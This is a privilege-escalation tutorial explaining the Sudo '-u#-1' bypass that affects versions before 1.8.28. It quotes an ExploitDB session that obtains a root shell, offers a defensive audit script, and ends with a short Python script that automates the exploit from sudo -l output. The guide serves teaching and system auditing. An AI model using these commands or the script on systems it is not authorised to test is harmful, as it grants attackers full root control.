
Linux Privilege Escalation – Vulnerable Sudo Version

Introduction

Sudo is a program for Unix-like operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of Sudo were designed to run commands only as the superuser. It is commonly used in scenarios where normal users need to be able to perform actions as root.

Over the years, certain versions of Sudo were found to be affected by vulnerabilities that allowed attackers to escalate privileges to root. This guide demonstrates how to identify a vulnerable Sudo version and how it can be exploited to perform privilege escalation.

Identifying Vulnerable Sudo Version

The following command can be used in Unix-like operating systems to identify the running version of Sudo:

sudo -V | grep "Sudo ver"

The output above shows that the current Sudo version is 1.8.25p1. A quick search using SearchSploit suggests that this version of Sudo may be vulnerable:

Specifically, looking at exploit 47502 from ExploitDB, this vulnerability allows an attacker to bypass Sudo rules that have been set up with the “!” symbol, which is used to specify that a user should not be able to run a certain command as root (or as any other given user). A Sudo rule is made up of the following parts:

  • The user the rule applies to
  • The user/group the command can be executed as
  • The allowed command(s)

For example:

john (jack, jack) cp

The above means that the john user can execute the “cp” command as the jack user/group.

Through this exploit, the rule can be bypassed by issuing the following command:

sudo -u#-1 [command to execute]

This exploit is possible because this version of Sudo does not validate whether the user ID specified with the -u flag actually exists, and executes the command using an arbitrary user ID with root privileges. Since -u#-1 resolves to 0, which is the user ID of the root user, the command is executed as root.

The full explanation from ExploitDB is available below:

User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash

So user hacker can't run /bin/bash as root (!root)

EXPLOIT:

sudo -u#-1 /bin/bash

Example:

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :
Sudo doesn't check for the existence of the specified user id and executes the command with an arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission

This exploit seems to affect versions of Sudo prior to 1.8.28, even though the exploit name only mentions Sudo version 1.8.27 being vulnerable.

When executing the following command as the “hugo” user, it appears this user can execute /bin/bash as all users other than root:

sudo -l

This could be exploited as the “!” symbol is used to specify what users /bin/bash can be executed as.
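The two checks described above (the Sudo version reported by sudo -V and the presence of a “!” exclusion in the Run-As part of a sudo -l rule) can be turned into a small audit helper. The script below is an added example written for this page, not code from the original post or from ExploitDB; it parses the two command outputs, flags versions older than the 1.8.28 fix mentioned later in this guide, and reports whether a host combines an old Sudo with an excluded-user rule. The sudo -V and sudo -l outputs embedded in it are constructed samples modelled on the “hugo” rule shown above, not output captured from a real host.

```python
#!/usr/bin/env python3
"""Audit helper: report whether a host combines a Sudo release older than
1.8.28 with a sudoers rule that relies on a "!" Run-As exclusion."""
import re
import subprocess

# First release in which the -u#-1 bypass is fixed, as stated on this page.
FIXED_VERSION = (1, 8, 28, 0)


def parse_sudo_version(sudo_v_output):
    """Turn the 'Sudo version X.Y.ZpN' line from `sudo -V` into a comparable tuple,
    e.g. '1.8.25p1' -> (1, 8, 25, 1). A missing 'pN' suffix counts as p0."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", sudo_v_output)
    if not m:
        raise ValueError("no 'Sudo version' line found in output")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_is_vulnerable(version):
    """True for any release before the fixed version (tuple comparison)."""
    return version < FIXED_VERSION


def find_negated_runas_rules(sudo_l_output):
    """Return (runas_spec, command) for every `sudo -l` rule line whose Run-As
    list uses a '!' exclusion, e.g. '(ALL, !root) /bin/bash'."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\s*\(([^)]*)\)\s+(.+)$", line)
        if m and "!" in m.group(1):
            findings.append((m.group(1).strip(), m.group(2).strip()))
    return findings


def assess(sudo_v_output, sudo_l_output):
    """Combine both checks: the host is exposed only when the version is old
    AND at least one rule depends on a '!' exclusion."""
    version = parse_sudo_version(sudo_v_output)
    rules = find_negated_runas_rules(sudo_l_output)
    return {
        "version": version,
        "negated_rules": rules,
        "exposed": version_is_vulnerable(version) and bool(rules),
    }


def capture(cmd):
    """Run a command and return its stdout (used for a live check)."""
    return subprocess.run(cmd, capture_output=True, text=True).stdout


# Constructed sample outputs (not captured from a real host).
SAMPLE_SUDO_V = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"
SAMPLE_SUDO_L = (
    "Matching Defaults entries for hugo on this host:\n"
    "    env_reset, mail_badpass\n\n"
    "User hugo may run the following commands on this host:\n"
    "    (ALL, !root) /bin/bash\n"
)

if __name__ == "__main__":
    # For a live check replace the samples with capture(["sudo", "-V"])
    # and capture(["sudo", "-l"]).
    print(assess(SAMPLE_SUDO_V, SAMPLE_SUDO_L))
```

The version is compared as a tuple so that patch levels such as 1.8.25p1 sort correctly against 1.8.28; a host that still reports an old version should be upgraded to 1.8.28 or later regardless of its rules, while the rule scan helps prioritise which hosts an attacker could actually use the bypass on.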

Exploiting Vulnerable Sudo Version

When executing the following command, the “hugo” user is able to execute /bin/bash as root, and therefore gain an elevated shell:

sudo -u#-1 /bin/bash

As in this case, public exploits often come with automated scripts that exploit the vulnerability without the need to perform the checks above. It is nevertheless best to carry out these steps manually, both to understand what the exploit does and to avoid the risks of running unknown code. The Python script below can be used to automate this particular exploit:

#!/usr/bin/python3
import os
import subprocess

# List the sudo rules for the current user (equivalent to running "sudo -l")
rules = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout

# Take the command from the first rule granting "ALL" Run-As users,
# e.g. "(ALL, !root) /bin/bash" -> "/bin/bash"
binary = ""
for line in rules.splitlines():
    if "ALL" in line and ")" in line:
        binary = line.split(")", 1)[1].strip()
        break

if not binary:
    raise SystemExit("No matching sudo rule found for this user")

# Execute sudo exploit: vulnerable versions map -u#-1 to uid 0
print("Lets hope it works")
os.system("sudo -u#-1 " + binary)

The script simply runs sudo -l, identifies whether the current user is allowed to execute commands as root, and then executes such commands using the syntax shown in the previous steps.

Conclusion

Like many Unix administrative tools, Sudo is very powerful and greatly helps users perform day-to-day operations; however, when it is affected by a vulnerability like the one seen above it becomes very dangerous and can result in a full system compromise.